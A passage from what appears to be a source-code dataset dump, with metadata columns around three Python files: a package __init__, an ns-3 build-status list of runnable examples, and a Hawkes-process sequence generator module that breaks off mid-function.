| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff9f8f871223cbf21633f777d013d3d15bbc6700
| 66
|
py
|
Python
|
run/__init__.py
|
ealcobaca/optimizer_pool
|
e93ac72c1547bc3813a0edf822d5fd453f22ce49
|
[
"MIT"
] | 1
|
2022-03-10T21:46:07.000Z
|
2022-03-10T21:46:07.000Z
|
run/__init__.py
|
ealcobaca/optimizer_pool
|
e93ac72c1547bc3813a0edf822d5fd453f22ce49
|
[
"MIT"
] | null | null | null |
run/__init__.py
|
ealcobaca/optimizer_pool
|
e93ac72c1547bc3813a0edf822d5fd453f22ce49
|
[
"MIT"
] | 1
|
2022-03-10T21:46:09.000Z
|
2022-03-10T21:46:09.000Z
|
from run.run_real import Run_real
from run.run_PSO import Run_PSO
| 22
| 33
| 0.848485
| 14
| 66
| 3.714286
| 0.357143
| 0.269231
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 66
| 2
| 34
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
441cc1fcbf285eb769a00c3f77129f03547305f0
| 12,718
|
py
|
Python
|
ns-allinone-3.27/ns-3.27/build/build-status.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | null | null | null |
ns-allinone-3.27/ns-3.27/build/build-status.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | null | null | null |
ns-allinone-3.27/ns-3.27/build/build-status.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# NOTE(review): this build-status file is machine-generated by the ns-3
# waf build system — do not edit the lists by hand; rebuild to refresh them.
# Programs that are runnable.
ns3_runnable_programs = ['build/src/aodv/examples/ns3.27-aodv-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-one-hop-debug', 'build/src/buildings/examples/ns3.27-buildings-pathloss-profiler-debug', 'build/src/config-store/examples/ns3.27-config-store-save-debug', 'build/src/core/examples/ns3.27-main-callback-debug', 'build/src/core/examples/ns3.27-sample-simulator-debug', 'build/src/core/examples/ns3.27-main-ptr-debug', 'build/src/core/examples/ns3.27-main-random-variable-debug', 'build/src/core/examples/ns3.27-main-random-variable-stream-debug', 'build/src/core/examples/ns3.27-sample-random-variable-debug', 'build/src/core/examples/ns3.27-sample-random-variable-stream-debug', 'build/src/core/examples/ns3.27-command-line-example-debug', 'build/src/core/examples/ns3.27-hash-example-debug', 'build/src/core/examples/ns3.27-sample-log-time-format-debug', 'build/src/core/examples/ns3.27-test-string-value-formatting-debug', 'build/src/csma/examples/ns3.27-csma-one-subnet-debug', 'build/src/csma/examples/ns3.27-csma-broadcast-debug', 'build/src/csma/examples/ns3.27-csma-packet-socket-debug', 'build/src/csma/examples/ns3.27-csma-multicast-debug', 'build/src/csma/examples/ns3.27-csma-raw-ip-socket-debug', 'build/src/csma/examples/ns3.27-csma-ping-debug', 'build/src/csma-layout/examples/ns3.27-csma-star-debug', 'build/src/dsdv/examples/ns3.27-dsdv-manet-debug', 'build/src/dsr/examples/ns3.27-dsr-debug', 'build/src/energy/examples/ns3.27-li-ion-energy-source-debug', 'build/src/energy/examples/ns3.27-rv-battery-model-test-debug', 'build/src/energy/examples/ns3.27-basic-energy-model-test-debug', 'build/src/fd-net-device/examples/ns3.27-dummy-network-debug', 'build/src/fd-net-device/examples/ns3.27-fd2fd-onoff-debug', 'build/src/internet/examples/ns3.27-main-simple-debug', 'build/src/internet-apps/examples/ns3.27-dhcp-example-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-packet-print-debug', 
'build/src/lr-wpan/examples/ns3.27-lr-wpan-phy-test-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-data-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-model-plot-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-distance-plot-debug', 'build/src/lte/examples/ns3.27-lena-cqi-threshold-debug', 'build/src/lte/examples/ns3.27-lena-dual-stripe-debug', 'build/src/lte/examples/ns3.27-lena-fading-debug', 'build/src/lte/examples/ns3.27-lena-intercell-interference-debug', 'build/src/lte/examples/ns3.27-lena-pathloss-traces-debug', 'build/src/lte/examples/ns3.27-lena-profiling-debug', 'build/src/lte/examples/ns3.27-lena-rem-debug', 'build/src/lte/examples/ns3.27-lena-rem-sector-antenna-debug', 'build/src/lte/examples/ns3.27-lena-rlc-traces-debug', 'build/src/lte/examples/ns3.27-lena-simple-debug', 'build/src/lte/examples/ns3.27-lena-simple-epc-debug', 'build/src/lte/examples/ns3.27-lena-deactivate-bearer-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-measures-debug', 'build/src/lte/examples/ns3.27-lena-frequency-reuse-debug', 'build/src/lte/examples/ns3.27-lena-distributed-ffr-debug', 'build/src/lte/examples/ns3.27-lena-uplink-power-control-debug', 'build/src/mesh/examples/ns3.27-mesh-debug', 'build/src/mobility/examples/ns3.27-main-grid-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-walk-debug', 'build/src/mobility/examples/ns3.27-mobility-trace-example-debug', 'build/src/mobility/examples/ns3.27-ns2-mobility-trace-debug', 'build/src/mobility/examples/ns3.27-bonnmotion-ns2-example-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-debug', 'build/src/mpi/examples/ns3.27-third-distributed-debug', 'build/src/mpi/examples/ns3.27-nms-p2p-nix-distributed-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-empty-node-debug', 'build/src/netanim/examples/ns3.27-dumbbell-animation-debug', 
'build/src/netanim/examples/ns3.27-grid-animation-debug', 'build/src/netanim/examples/ns3.27-star-animation-debug', 'build/src/netanim/examples/ns3.27-wireless-animation-debug', 'build/src/netanim/examples/ns3.27-uan-animation-debug', 'build/src/netanim/examples/ns3.27-colors-link-description-debug', 'build/src/netanim/examples/ns3.27-resources-counters-debug', 'build/src/network/examples/ns3.27-main-packet-header-debug', 'build/src/network/examples/ns3.27-main-packet-tag-debug', 'build/src/network/examples/ns3.27-packet-socket-apps-debug', 'build/src/nix-vector-routing/examples/ns3.27-nix-simple-debug', 'build/src/nix-vector-routing/examples/ns3.27-nms-p2p-nix-debug', 'build/src/olsr/examples/ns3.27-simple-point-to-point-olsr-debug', 'build/src/olsr/examples/ns3.27-olsr-hna-debug', 'build/src/point-to-point/examples/ns3.27-main-attribute-value-debug', 'build/src/propagation/examples/ns3.27-main-propagation-loss-debug', 'build/src/propagation/examples/ns3.27-jakes-propagation-model-example-debug', 'build/src/sixlowpan/examples/ns3.27-example-sixlowpan-debug', 'build/src/sixlowpan/examples/ns3.27-example-ping-lr-wpan-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-matrix-propagation-loss-model-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-with-microwave-oven-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-example-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-regional-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-example-debug', 'build/src/stats/examples/ns3.27-double-probe-example-debug', 'build/src/stats/examples/ns3.27-time-probe-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-aggregator-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-helper-example-debug', 'build/src/stats/examples/ns3.27-file-aggregator-example-debug', 'build/src/stats/examples/ns3.27-file-helper-example-debug', 
'build/src/topology-read/examples/ns3.27-topology-example-sim-debug', 'build/src/traffic-control/examples/ns3.27-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-red-vs-ared-debug', 'build/src/traffic-control/examples/ns3.27-adaptive-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-pfifo-vs-red-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-basic-test-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-asymmetric-debug', 'build/src/traffic-control/examples/ns3.27-pie-example-debug', 'build/src/uan/examples/ns3.27-uan-cw-example-debug', 'build/src/uan/examples/ns3.27-uan-rc-example-debug', 'build/src/virtual-net-device/examples/ns3.27-virtual-net-device-debug', 'build/src/wave/examples/ns3.27-wave-simple-80211p-debug', 'build/src/wave/examples/ns3.27-wave-simple-device-debug', 'build/src/wave/examples/ns3.27-vanet-routing-compare-debug', 'build/src/wifi/examples/ns3.27-wifi-phy-test-debug', 'build/src/wifi/examples/ns3.27-test-interference-helper-debug', 'build/src/wifi/examples/ns3.27-wifi-manager-example-debug', 'build/src/wimax/examples/ns3.27-wimax-ipv4-debug', 'build/src/wimax/examples/ns3.27-wimax-multicast-debug', 'build/src/wimax/examples/ns3.27-wimax-simple-debug', 'build/examples/energy/ns3.27-energy-model-example-debug', 'build/examples/energy/ns3.27-energy-model-with-harvesting-example-debug', 'build/examples/error-model/ns3.27-simple-error-model-debug', 'build/examples/ipv6/ns3.27-icmpv6-redirect-debug', 'build/examples/ipv6/ns3.27-ping6-debug', 'build/examples/ipv6/ns3.27-radvd-debug', 'build/examples/ipv6/ns3.27-radvd-two-prefix-debug', 'build/examples/ipv6/ns3.27-test-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-two-MTU-debug', 'build/examples/ipv6/ns3.27-loose-routing-ipv6-debug', 'build/examples/ipv6/ns3.27-wsn-ping6-debug', 'build/examples/matrix-topology/ns3.27-matrix-topology-debug', 
'build/examples/naming/ns3.27-object-names-debug', 'build/examples/routing/ns3.27-dynamic-global-routing-debug', 'build/examples/routing/ns3.27-static-routing-slash32-debug', 'build/examples/routing/ns3.27-global-routing-slash32-debug', 'build/examples/routing/ns3.27-global-injection-slash32-debug', 'build/examples/routing/ns3.27-simple-global-routing-debug', 'build/examples/routing/ns3.27-simple-alternate-routing-debug', 'build/examples/routing/ns3.27-mixed-global-routing-debug', 'build/examples/routing/ns3.27-simple-routing-ping6-debug', 'build/examples/routing/ns3.27-manet-routing-compare-debug', 'build/examples/routing/ns3.27-ripng-simple-network-debug', 'build/examples/routing/ns3.27-rip-simple-network-debug', 'build/examples/routing/ns3.27-global-routing-multi-switch-plus-router-debug', 'build/examples/socket/ns3.27-socket-bound-static-routing-debug', 'build/examples/socket/ns3.27-socket-bound-tcp-static-routing-debug', 'build/examples/socket/ns3.27-socket-options-ipv4-debug', 'build/examples/socket/ns3.27-socket-options-ipv6-debug', 'build/examples/stats/ns3.27-wifi-example-sim-debug', 'build/examples/tcp/ns3.27-tcp-large-transfer-debug', 'build/examples/tcp/ns3.27-tcp-nsc-lfn-debug', 'build/examples/tcp/ns3.27-tcp-nsc-zoo-debug', 'build/examples/tcp/ns3.27-tcp-star-server-debug', 'build/examples/tcp/ns3.27-star-debug', 'build/examples/tcp/ns3.27-tcp-bulk-send-debug', 'build/examples/tcp/ns3.27-tcp-pcap-nanosec-example-debug', 'build/examples/tcp/ns3.27-tcp-nsc-comparison-debug', 'build/examples/tcp/ns3.27-tcp-variants-comparison-debug', 'build/examples/traffic-control/ns3.27-traffic-control-debug', 'build/examples/traffic-control/ns3.27-queue-discs-benchmark-debug', 'build/examples/traffic-control/ns3.27-red-vs-fengadaptive-debug', 'build/examples/traffic-control/ns3.27-red-vs-nlred-debug', 'build/examples/tutorial/ns3.27-hello-simulator-debug', 'build/examples/tutorial/ns3.27-first-debug', 'build/examples/tutorial/ns3.27-second-debug', 
'build/examples/tutorial/ns3.27-third-debug', 'build/examples/tutorial/ns3.27-fourth-debug', 'build/examples/tutorial/ns3.27-fifth-debug', 'build/examples/tutorial/ns3.27-sixth-debug', 'build/examples/tutorial/ns3.27-seventh-debug', 'build/examples/udp/ns3.27-udp-echo-debug', 'build/examples/udp-client-server/ns3.27-udp-client-server-debug', 'build/examples/udp-client-server/ns3.27-udp-trace-client-server-debug', 'build/examples/wireless/ns3.27-mixed-wired-wireless-debug', 'build/examples/wireless/ns3.27-wifi-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-clear-channel-cmu-debug', 'build/examples/wireless/ns3.27-wifi-ap-debug', 'build/examples/wireless/ns3.27-wifi-wired-bridging-debug', 'build/examples/wireless/ns3.27-multirate-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-grid-debug', 'build/examples/wireless/ns3.27-wifi-simple-infra-debug', 'build/examples/wireless/ns3.27-wifi-simple-interference-debug', 'build/examples/wireless/ns3.27-wifi-blockack-debug', 'build/examples/wireless/ns3.27-ofdm-validation-debug', 'build/examples/wireless/ns3.27-ofdm-ht-validation-debug', 'build/examples/wireless/ns3.27-ofdm-vht-validation-debug', 'build/examples/wireless/ns3.27-wifi-hidden-terminal-debug', 'build/examples/wireless/ns3.27-ht-wifi-network-debug', 'build/examples/wireless/ns3.27-vht-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-timing-attributes-debug', 'build/examples/wireless/ns3.27-wifi-sleep-debug', 'build/examples/wireless/ns3.27-power-adaptation-distance-debug', 'build/examples/wireless/ns3.27-power-adaptation-interference-debug', 'build/examples/wireless/ns3.27-rate-adaptation-distance-debug', 'build/examples/wireless/ns3.27-wifi-aggregation-debug', 'build/examples/wireless/ns3.27-simple-ht-hidden-stations-debug', 'build/examples/wireless/ns3.27-80211n-mimo-debug', 'build/examples/wireless/ns3.27-mixed-network-debug', 'build/examples/wireless/ns3.27-wifi-tcp-debug', 
'build/examples/wireless/ns3.27-80211e-txop-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-example-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-interference-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-saturation-example-debug', 'build/examples/wireless/ns3.27-ofdm-he-validation-debug', 'build/examples/wireless/ns3.27-he-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-multi-tos-debug', 'build/examples/wireless/ns3.27-wifi-backward-compatibility-debug', 'build/scratch/ns3.27-scratch-simulator-debug', 'build/scratch/subdir/ns3.27-subdir-debug']
# Scripts that are runnable.
ns3_runnable_scripts = ['csma-bridge.py', 'sample-simulator.py', 'wifi-olsr-flowmon.py', 'simple-routing-ping6.py', 'first.py', 'second.py', 'third.py', 'mixed-wired-wireless.py', 'wifi-ap.py']
| 1,413.111111
| 12,438
| 0.787231
| 2,040
| 12,718
| 4.905882
| 0.141176
| 0.103917
| 0.150679
| 0.090927
| 0.758393
| 0.742206
| 0.677758
| 0.542966
| 0.307454
| 0.098321
| 0
| 0.054082
| 0.018635
| 12,718
| 8
| 12,439
| 1,589.75
| 0.747777
| 0.005976
| 0
| 0
| 0
| 22
| 0.927045
| 0.920082
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
444e975a0c4fb13e72c462d983b88bade759c75d
| 141,070
|
py
|
Python
|
modules/sequence_generators.py
|
ZhaozhiQIAN/neurawkes
|
1a3caa837b34f77ac9d078bc9bf10ff10a3bf959
|
[
"MIT"
] | null | null | null |
modules/sequence_generators.py
|
ZhaozhiQIAN/neurawkes
|
1a3caa837b34f77ac9d078bc9bf10ff10a3bf959
|
[
"MIT"
] | null | null | null |
modules/sequence_generators.py
|
ZhaozhiQIAN/neurawkes
|
1a3caa837b34f77ac9d078bc9bf10ff10a3bf959
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Here are the sequence generators
including LSTM generator and Hawkes generator
@author: hongyuan
"""
import pickle
import time
import numpy
import theano
from theano import sandbox
import theano.tensor as tensor
import os
#import scipy.io
from collections import defaultdict
from theano.tensor.shared_randomstreams import RandomStreams
import utils
import struct
dtype=theano.config.floatX
class HawkesGen(object):
    '''
    Sequence generator based on a multivariate Hawkes process.

    The process is parameterized by:
      mu    -- base intensity vector, shape (dim_process,)
      alpha -- excitation matrix, shape (dim_process, dim_process);
               alpha[:, k] is the jump every type's intensity takes
               when an event of type k occurs
      delta -- decay matrix, shape (dim_process, dim_process)

    Events are sampled with the thinning (Ogata) algorithm; see
    gen_one_seq for the reference.
    '''

    def __init__(self, settings):
        '''
        Build the generator.

        mu, alpha and delta are sampled uniformly at random unless
        settings['path_pre_train'] points to a pickled model saved by
        save_model, in which case the parameters are loaded from it.

        settings keys used here: 'args', 'sum_for_time', 'seed_random',
        'path_pre_train', and 'dim_process' (only when not pre-trained).
        '''
        self.args = settings['args']
        # If True, sample one arrival time from the summed intensity and
        # then draw the type; otherwise sample a time per type and keep
        # the earliest (see sample_one_event).
        self.sum_for_time = settings['sum_for_time']
        numpy.random.seed(settings['seed_random'])
        print("initializing ... ")
        if settings['path_pre_train'] is None:
            self.dim_process = settings['dim_process']
            self.mu = numpy.float32(
                numpy.random.uniform(
                    low=0.0, high=1.0,
                    size=(self.dim_process,)
                )
            )
            self.alpha = numpy.float32(
                numpy.random.uniform(
                    low=10.0, high=20.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
            self.delta = numpy.float32(
                numpy.random.uniform(
                    low=10.0, high=20.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
        else:
            path_pre_train = os.path.abspath(settings['path_pre_train'])
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.mu = model_pre_train['mu']
            self.alpha = model_pre_train['alpha']
            self.delta = model_pre_train['delta']
        self.name = 'HawkesGen'
        # Current intensity (starts at the base rate, no history yet).
        self.intensity = numpy.copy(self.mu)
        # Events of the sequence currently being generated.
        self.one_seq = []
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("done ")

    def set_params(self):
        '''Overwrite mu/alpha/delta with the fixed 4-type configuration
        used in the missing-data experiments: an event of type 1 excites
        type 0, an event of type 2 excites type 1, and types 0 and 3
        excite nothing (alpha[:, k] is the effect OF type k).'''
        print("set the params for missing data experiments ... ")
        self.dim_process = numpy.int32(4)
        self.mu = numpy.float32(
            numpy.ones((self.dim_process, ))
        )
        self.alpha = numpy.float32(
            numpy.array(
                [
                    [0.0, 1.0, 0.0, 0.0],
                    [0.0, 0.0, 1.0, 0.0],
                    [0.0, 0.0, 0.0, 0.0],
                    [0.0, 0.0, 0.0, 0.0]
                ]
            )
        )
        self.delta = numpy.float32(
            numpy.ones((self.dim_process, self.dim_process))
        )

    def set_args(self, dict_args):
        '''Replace the stored command-line/config arguments.'''
        self.args = dict_args

    def save_model(self, file_save):
        '''Pickle the process parameters (and metadata) to file_save so a
        later run can reload them via settings['path_pre_train'].'''
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'alpha': numpy.copy(self.alpha),
            'delta': numpy.copy(self.delta),
            'dim_process': self.dim_process,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)

    def restart_sequence(self):
        '''Clear the event history and reset the intensity to the base
        rate, i.e. restart the clock at time 0.'''
        self.intensity = numpy.copy(self.mu)
        self.one_seq = []
        self.cnt_total_event = numpy.int32(len(self.one_seq))

    def compute_intensity_given_past(self, time_current):
        '''Recompute self.intensity at time_current from the base rate mu
        plus the exponentially decayed contribution of every past event.
        No check that time_current exceeds the last event is needed --
        the callers only move time forward.'''
        self.intensity = numpy.copy(self.mu)
        for event in self.one_seq:
            time_since_start = event['time_since_start']
            type_event = event['type_event']
            change_time = time_current - time_since_start
            decay_frac = numpy.exp(
                -self.delta[:, type_event] * change_time
            )
            self.intensity += numpy.copy(
                self.alpha[:, type_event] * decay_frac
            )

    def sample_time_given_type(self, type_event):
        '''Sample the arrival time of the next event of type type_event
        (the "k" of the model formulation) via thinning, starting from
        the time of the last event in self.one_seq (or 0 if empty).'''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_given_past(time_current)
        # Proposal rate: the intensity at the current time upper-bounds
        # the (decaying) intensity at any later time with no new events.
        intensity_hazard = numpy.copy(
            self.intensity[type_event]
        )
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            # Accept when U * proposal_rate <= true intensity.
            u = U * intensity_hazard / self.intensity[type_event]
            # Adaptive thinning: shrink the proposal rate to the current
            # intensity so later proposals reject less often.  (This was
            # disabled when the project's original data was generated.)
            intensity_hazard = numpy.copy(
                self.intensity[type_event]
            )
        return time_current

    def sample_time_for_all_type(self):
        '''Sample the arrival time of the next event of ANY type via
        thinning against the summed intensity, starting from the last
        event time in self.one_seq (or 0 if empty).'''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_given_past(time_current)
        intensity_hazard = numpy.sum(self.intensity)
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += E / intensity_hazard
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / numpy.sum(self.intensity)
            # Adaptive thinning (see sample_time_given_type).
            intensity_hazard = numpy.sum(self.intensity)
        return time_current

    def sample_one_event_sep(self):
        '''Sample a candidate time per event type independently and keep
        the earliest one; returns (time_since_start, type_event).'''
        time_of_happen = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for type_event in range(self.dim_process):
            # One thinning run per type.
            time_of_happen[type_event] = numpy.copy(
                self.sample_time_given_type(
                    type_event
                )
            )
        time_since_start_new = numpy.min(time_of_happen)
        type_event_new = numpy.argmin(time_of_happen)
        return time_since_start_new, type_event_new

    def sample_one_event_tog(self):
        '''Sample one time from the total intensity, then draw the type
        proportionally to the per-type intensities at that time.'''
        time_since_start_new = self.sample_time_for_all_type()
        self.compute_intensity_given_past(
            time_since_start_new
        )
        prob = self.intensity / numpy.sum(self.intensity)
        # NOTE(review): prob is float32; numpy.random.choice requires the
        # probabilities to sum to 1 within a tight tolerance -- confirm
        # this never trips for large dim_process.
        type_event_new = numpy.random.choice(
            range(self.dim_process), p=prob
        )
        return time_since_start_new, numpy.int32(type_event_new)

    def sample_one_event(self):
        '''Dispatch to the joint or per-type sampler per self.sum_for_time.'''
        if self.sum_for_time:
            return self.sample_one_event_tog()
        else:
            return self.sample_one_event_sep()

    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of max_len events into self.one_seq.

        Liniger (2009), p. 28, describes the "thinning algorithm":
        generate one event of each type, take the minimum, and discard
        the others.  max_len is a pre-sampled length for the sequence.
        Each stored event records its running index, type, absolute time,
        time since the previous event, and time since the previous event
        of the same type.
        '''
        self.restart_sequence()
        time_since_start = numpy.float32(0.0)
        # Last occurrence time per type, for time_since_last_same_event.
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for idx_event in range(max_len):
            time_since_start_new, type_event_new = self.sample_one_event()
            self.cnt_total_event += 1
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )

    def gen_seqs(self, settings):
        '''Generate settings['num_seqs'] sequences into self.list_seqs,
        each with a length drawn uniformly from
        [settings['min_len'], settings['max_len']].'''
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # Progress report every 10 sequences.
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)

    def print_some(self):
        '''Pretty-print up to the first 10 generated sequences.'''
        print("printing some seqs ... ")
        # Clamp to the number of sequences actually generated; the old
        # hard-coded range(10) raised IndexError for fewer than 10 seqs.
        for idx_seq in range(min(10, len(self.list_seqs))):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)

    def save_seqs(self, file_save):
        '''Pickle the generated sequences to file_save.'''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class HawkesInhibGen(object):
    '''
    Sequence generator for a Hawkes process with inhibition.

    Like HawkesGen, but mu and alpha may be negative (inhibition); the
    raw "pre-intensity" mu + sum of decayed alpha contributions is passed
    through a softplus (soft_relu) to keep the actual intensity positive.
    Thinning therefore needs an explicit upper bound, computed with the
    positive parts of alpha (see compute_intensity_upper_bound).
    '''

    def __init__(self, settings):
        '''
        Build the generator.

        mu and alpha are sampled uniformly in [-1, 1] (so both excitation
        and inhibition occur) and delta in [10, 20], unless
        settings['path_pre_train'] points to a pickled model saved by
        save_model, in which case the parameters are loaded from it.
        '''
        print("initializing ... ")
        self.args = settings['args']
        # If True, sample one arrival time from the summed intensity and
        # then draw the type; otherwise sample a time per type.
        self.sum_for_time = settings['sum_for_time']
        numpy.random.seed(settings['seed_random'])
        if settings['path_pre_train'] is None:
            self.dim_process = settings['dim_process']
            self.mu = numpy.float32(
                numpy.random.uniform(
                    low=-1.0, high=1.0,
                    size=(self.dim_process,)
                )
            )
            self.alpha = numpy.float32(
                numpy.random.uniform(
                    low=-1.0, high=1.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
            self.delta = numpy.float32(
                numpy.random.uniform(
                    low=10.0, high=20.0,
                    size=(self.dim_process, self.dim_process)
                )
            )
        else:
            path_pre_train = os.path.abspath(settings['path_pre_train'])
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.mu = model_pre_train['mu']
            self.alpha = model_pre_train['alpha']
            self.delta = model_pre_train['delta']
        self.name = 'HawkesInhibGen'
        # Pre-activation intensity and its softplus.
        self.intensity_tilde = numpy.copy(self.mu)
        self.intensity = numpy.log(
            numpy.float32(1.0) + numpy.exp(
                self.intensity_tilde
            )
        )
        # Upper bounds used by the thinning sampler (filled on demand).
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        # Events of the sequence currently being generated.
        self.one_seq = []
        self.cnt_total_event = numpy.int32(len(self.one_seq))
        print("done ")

    def set_args(self, dict_args):
        '''Replace the stored command-line/config arguments.'''
        self.args = dict_args

    def soft_relu(self, x):
        '''Softplus: log(1 + exp(x)); maps the pre-intensity to a
        strictly positive intensity.'''
        return numpy.log(numpy.float32(1.0) + numpy.exp(x))

    def hard_relu(self, x):
        '''ReLU via 0.5 * (x + |x|); used to keep only the excitatory
        part of alpha when bounding the intensity from above.'''
        return numpy.float32(0.5) * (x + numpy.abs(x))

    def save_model(self, file_save):
        '''Pickle the process parameters (and metadata) to file_save so a
        later run can reload them via settings['path_pre_train'].'''
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'alpha': numpy.copy(self.alpha),
            'delta': numpy.copy(self.delta),
            'dim_process': self.dim_process,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)

    def restart_sequence(self):
        '''Clear the event history and reset the intensity to softplus(mu),
        i.e. restart the clock at time 0.'''
        self.intensity_tilde = numpy.copy(self.mu)
        self.intensity = self.soft_relu(self.intensity_tilde)
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        self.one_seq = []
        self.cnt_total_event = numpy.int32(len(self.one_seq))

    def compute_intensity_given_past(self, time_current):
        '''Recompute self.intensity at time_current: the pre-intensity is
        mu plus the decayed (possibly negative) alpha contributions of all
        past events, then softplus.'''
        self.intensity_tilde = numpy.copy(self.mu)
        for event in self.one_seq:
            time_since_start = event['time_since_start']
            type_event = event['type_event']
            change_time = time_current - time_since_start
            decay_frac = numpy.exp(
